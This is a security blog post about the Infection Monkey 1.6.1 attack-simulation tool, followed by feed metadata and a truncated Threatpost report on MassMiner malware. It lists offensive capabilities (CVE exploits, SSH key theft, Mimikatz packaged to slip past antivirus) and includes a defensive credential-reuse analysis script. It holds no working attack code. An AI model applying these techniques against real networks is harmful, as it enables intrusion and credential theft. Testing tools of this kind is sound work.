I'm sure you must have read my previous post titled [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned the Guardicore Infection Monkey. The good news is that it has been updated: we now have **Infection Monkey 1.6.1**. An important point about this version is that it is an AWS-only release.
## What is Infection Monkey?
> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.
## Infection Monkey 1.6.1 Changes:
Infection Monkey 1.6.1 is now integrated with AWS Security Hub. This lets anyone verify and test the resilience of their AWS environment and correlate the findings with the native security solutions and benchmark score.
Additionally, I missed posting about another release, **Infection Monkey 1.6**, which is also important. Hence, I'm covering it here:
## Infection Monkey 1.6 Change Log:
**New Features:**
* Detect cross-segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).
* The Monkey can analyse your domain for possible pass-the-hash attacks. By cross-referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. PR [#170](<https://github.com/guardicore/monkey/pull/170>).
* SSH key stealing. The Monkey will now steal accessible SSH keys and use them when connecting to SSH servers. PR [#138](<https://github.com/guardicore/monkey/pull/138>).
* Implement a cross-platform attack for the [Struts2 multipart file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>). PR [#179](<https://github.com/guardicore/monkey/pull/179>).
* Implement a cross-platform attack for Oracle WebLogic CVE-2017-10271. PR [#180](<https://github.com/guardicore/monkey/pull/180>).
* The ElasticGroovy attack now supports Windows victims. PR [#181](<https://github.com/guardicore/monkey/pull/181>).
* Hadoop cluster RCE: abuse unauthenticated access to the YARN resource manager. PR [#182](<https://github.com/guardicore/monkey/pull/182>).
**Code improvements:**
* We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).
* Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).
* Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).
* Systemd permissions are now properly locked down.
* Fixed a situation where a successful Shellshock attack could freeze the attacking Monkey. PR [#200](<https://github.com/guardicore/monkey/pull/200>).
In other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup that arise from credential reuse, the pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 multipart file upload vulnerability (CVE-2017-5638), the Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), the Elasticsearch Groovy attack (CVE-2015-1427) and the Hadoop YARN Resource Manager remote code execution vulnerability.
Lots of exciting stuff from the guys at Guardicore Labs. Really good work!
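As an added illustration of the credential-reuse analysis described above (my own example, not Infection Monkey's code), the following Python models which secrets are obtainable on each host and which secrets grant admin access elsewhere, then reports the attack paths to critical servers and the passwords reused across hosts. Host names and secret labels are constructed sample data standing in for real hash values.

```python
"""Credential-reuse attack-path analysis, modelled on the cross-host checks
Infection Monkey 1.6 reports. Hosts, secret labels and cached logins below are
constructed sample data (assumption), not real hashes or real machines."""
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class Host:
    name: str
    critical: bool = False
    # Secret labels of local accounts (stand-ins for the password hashes
    # that could be dumped on this host).
    local_secrets: set = field(default_factory=set)
    # Secret labels of domain accounts whose logins are cached on this host.
    cached_secrets: set = field(default_factory=set)
    # Secret labels that grant administrative logon to this host.
    admin_secrets: set = field(default_factory=set)


def build_edges(hosts):
    """Edge A -> B exists when a secret obtainable on A (local or cached)
    also grants admin on B. Returns {src: {dst: [shared secrets]}}."""
    edges = defaultdict(dict)
    for a in hosts:
        obtainable = a.local_secrets | a.cached_secrets
        for b in hosts:
            if a is b:
                continue
            shared = obtainable & b.admin_secrets
            if shared:
                edges[a.name][b.name] = sorted(shared)
    return edges


def paths_to_critical(hosts, start):
    """Breadth-first search from one compromised host. Returns
    {critical_host: [hop, ...]}, the shortest path found to each critical
    host that is reachable purely through reused or cached credentials."""
    by_name = {h.name: h for h in hosts}
    edges = build_edges(hosts)
    paths = {start: [start]}
    queue = deque([start])
    found = {}
    while queue:
        cur = queue.popleft()
        for nxt in edges.get(cur, {}):
            if nxt in paths:
                continue
            paths[nxt] = paths[cur] + [nxt]
            if by_name[nxt].critical:
                found[nxt] = paths[nxt]
            queue.append(nxt)
    return found


def identical_passwords(hosts):
    """Secrets that grant admin on more than one host, i.e. the 'identical
    passwords' finding: {secret: [host, ...]}."""
    where = defaultdict(set)
    for h in hosts:
        for s in h.admin_secrets:
            where[s].add(h.name)
    return {s: sorted(n) for s, n in where.items() if len(n) > 1}


# Constructed sample environment: two workstations share a local admin
# password, and cached domain logins on them reach two critical servers.
SAMPLE_HOSTS = [
    Host("ws1", local_secrets={"localadmin-A"}, cached_secrets={"svc-backup"},
         admin_secrets={"localadmin-A"}),
    Host("ws2", local_secrets={"localadmin-A"}, cached_secrets={"dba"},
         admin_secrets={"localadmin-A"}),
    Host("fileserver", critical=True, admin_secrets={"svc-backup", "fs-admin"}),
    Host("db", critical=True, admin_secrets={"dba"}),
]


if __name__ == "__main__":
    for target, path in paths_to_critical(SAMPLE_HOSTS, "ws1").items():
        print(f"critical host {target} reachable via: {' -> '.join(path)}")
    for secret, hosts in identical_passwords(SAMPLE_HOSTS).items():
        print(f"secret {secret} grants admin on: {', '.join(hosts)}")
```

Feeding the output into remediation is the point: each reported path is a reused password to rotate or a cached privileged login to remove from a workstation.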
## Download Infection Monkey 1.6.1:
The following Infection Monkey 1.6.1 files are available for download:
1. infection_monkey_1.6.1_AWS_only.zip
2. infection_monkey_1.6.1_AWS_only.tar.gz
Get them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.
The post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).
{"id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "type": "pentestit", "bulletinFamily": "blog", "title": "UPDATE: Infection Monkey 1.6.1", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. 
[#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. 
In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "published": "2018-12-03T22:28:53", "modified": "2018-12-03T22:28:53", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "reporter": "Black", "references": [], "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "lastseen": "2018-12-03T23:18:27", "viewCount": 3923, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": 
["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-10271", "CVE-2017-5638"]}, {"type": "exploitdb", "idList": ["EDB-ID:43392", "EDB-ID:43458", "EDB-ID:43924"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fireeye", "idList": ["FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["7BA07704-21CC-5BFC-A0F9-8FDA2BC84402"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": 
["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "WEBLOGIC_2017_10271.NASL", "WEB_APPLICATION_SCANNING_112726"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626"]}, {"type": "osv", "idList": ["OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:146143"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", 
"idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:97009"]}, {"type": "symantec", "idList": ["SMNTC-101304"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:4DE731C9D113C3993C96A773C079023F", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:EEB3BA59922DDC6B345B8E6C153593DA", "THN:F03064A70C65D9BD62A8F5898BA276D2"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:420EE567E806D93092741D7BB375AC57", 
"THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-29395", "1337DAY-ID-29668"]}]}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", 
"idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2015-1427", "CVE-2017-5638"]}, {"type": "exploitdb", "idList": ["EDB-ID:43458", "EDB-ID:43924"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["2ED15233-2A01-53F8-A939-8A4D06481CF4", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", 
"OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2017-3236626"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:146143"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-29668"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-10271", "epss": "0.975240000", "percentile": "0.999740000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}], "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1683995972, "epss": 1678874978}, "_internal": {"score_hash": "24335a9059d887ba0e5c5728ba5248f6"}}
{"threatpost": [{"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). 
It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. 
